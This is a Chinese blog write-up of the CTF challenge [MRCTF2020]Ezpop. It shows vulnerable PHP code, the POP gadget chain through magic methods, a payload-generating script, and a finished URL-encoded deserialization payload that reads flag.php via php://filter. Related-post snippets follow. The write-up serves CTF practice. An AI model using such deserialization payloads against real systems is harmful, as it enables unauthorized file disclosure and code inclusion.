[WP/BUU/Web/反序列化] [MRCTF2020]Ezpop

最新推荐文章于 2022-04-27 13:05:48 发布
最新推荐文章于 2022-04-27 13:05:48 发布
阅读量164 收藏
点赞数
分类专栏: # Web安全 # 凌晨四点起床刷题 文章标签: 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/120753413
版权

源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    // 包含文件flag.php
    public function append($value){
        include($value);
    }
    // 对象函数形式调用时触发
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    
    // 调用$str的source,TEST不存在source属性,触发Test::__get()
    public function __toString(){
        return $this->str->source;
    }
	
	// $this->source 进行字符串比较,触发Test::__tostring
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
	// 调用函数,函数名为function,用此调用Modifier::__invoke()
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

POP

O1(Show)::__wakeup() [$source=] -> O2(Show)::__tostring() [$str=O(Test)] -> Test::_get() [$p=O(Modifier)] -> Modifier::_invoke() [$var=flag.php]

Payload生成

<?php
class Modifier {
    protected  $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $str;
    public $source;
    public function __construct($a){
        if($a == 1){
            $this->str = new Test();
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }
}
$a = new Show(2);
$a->source  = new Show(1);
echo urlencode(serialize($a));

payload[GET]

?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A3%3A%22str%22%3BN%3Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A6%3A%22source%22%3BN%3B%7D%7D
車鈊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
[MRCTF2020] - Web
qtL0ng的博客
07-01 1039
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
强网杯2021部分web wp
qq_34097497的博客
06-15 883
强网杯2021
[MRCTF2020]PYWebsite -wp
freerats的博客
08-04 1345
查看源码 发现一段前段验证,然后发现在目录下有一个flag.php 提示验证在后端,所以前面那个前端验证没用(也正常,前端验证都可以直接修改) 购买者的ip已经被记录,本地可以看到flag,那么使用xff或者client-ip伪造一下ip试试。 bp抓包 发现xff可以直接获得flag ...
MRCTF web部分复现wp
xlcvv的博客
04-05 692
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就传入的为数组,md5()函数无法处理数组,如果传入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 430
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
阈下质子-核碰撞中各向异性Λ/Σ的生成对Ξ重数的影响
03-21
重子进行分析 在BUU型运输模型的框架中,亚阈值质子-核(<math> <mi> p </ mi> <mo> + </ mo> <mi> A </ mi> </ math>)碰撞产生。 我们提出了在次级Λ或Σ超子与目标核的核子碰撞中产生的新机制。 我们...
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
NEWSCTF第二届--官方wp(2021.6.1萌新赛)
热门推荐
qq_55400494的博客
06-04 1万+
未经同意不得对本次比赛题目二次开发或做任何商业用途 题目源码及部分wp汇总如下 Reverse 1.2021.6.1萌新赛-re_signin 出题人:mumuzi 2.2021.6.1萌新赛-1+1的签到题 出题人:shangu 3.2021.6.1萌新赛-开门啊-1 出题人: tomPeter15 flag为ASCII可显示字符 4.2021.6.1萌新赛-开门啊-2 出题人: tomPeter15 flag为ASCII可显示字符 5.2021.6.1萌新赛-Qsay 出题人:Qfrost exp.cp
[MRCTF2020]Ezpop--WP
weixin_51313108的博客
08-31 254
[MRCTF2020]Ezpop考点POP链的介绍PHP魔幻函数![在这里插入图片描述](https://img-blog.csdnimg.cn/a52a82820b274d238337a254503da96f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5bGx5Lit6Zuo5a6i,size_20,color_FFFFFF,t_70,g_se,x_16)解题过程 考点 PH
2022MRCTF-wp
qq_45603443的博客
04-27 651
2022MRCTF-wpWebJust HackingGod_of_GPAWebCheckInJava_mem_shell_BasicJava_mem_shell_FilterMiscpddConnecting...Tip Web Just Hacking 爆出密码foobared redis getshell 在root目录docker config发现账号密码。 登录发现私有镜像 本地运行getflag God_of_GPA 笔记页面有dom xss 认证的地方存在xss 可把token发到其他地
[BUUCTF][MRCTF2020]部分web wp
cosmoslin的博客
10-11 707
[MRCTF2020]你传你????呢 学习链接:[CTF].htaccess的使用技巧总结 fuzz测试,发现过滤了php后缀,中间件是apache,可以上传png图片马。 思路:利用.htaccess来将png文件当作php文件解析 先上传.htaccess文件,文件解析 AddType application/x-httpd-php .png 然后再上传一个png图片马 最后用蚁剑连接就可以啦! [MRCTF2020]Ez_bypass include 'flag.php'; $flag='MR
[MRCTF2020]Ezaudit WP
車鈊的博客
10-23 479
进入网站 获得源码 看到熟悉的网页模板想到了敏感文档泄露和用户信息查询 点击全部链接,尝试输入邮箱发现不是。 完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本 python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1 发现无论多小的线程速度都会产生429状态码 原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。 只能进行手工检测 发现在www.z
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1512
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
[MRCTF2020]Ezpop
qq_52907838的博客
07-30 269
打开环境,得到源码: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var
BUUCTF_web[MRCTF2020]你传你呢—超详细wp解析
weixin_52653109的博客
05-06 1116
开始直接传木马,但不管是“图片马”还是其他格式的马,都传不上,一直返回 开始还以为是防火过滤太强了,一直试着绕过。看了下别人的wp原来考察了个htaccess(分布式配置文件) 看了百科和一些大佬的博客介绍的很抽象不好理解,推荐这个网站通俗易懂些 7个常用的.htaccess代码 下面是解题步骤: 一、创建个".htaccess"文件 写入 AddType application/x-httpd-php .png 意思是:上传的".png"会被当做 php代码执行。 先创个文档写入,再另存为选择所有
【CTF WriteUp】2020全国工业互联网安全技术技能大赛密码题(Crypto)wp
qq_45603443的博客
10-24 4511
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 护网杯2020wp一、题目 2E二、根据题目给脚本推出EXP如下:1.Task.py2. print(key)3. print(1)4. mt.py得到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/20201024231116648.jpg#pic_center) 一、题目 2E 二、根据题目给脚本推出EXP如下: 1.Task.py 代码如下(示例): import random from
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值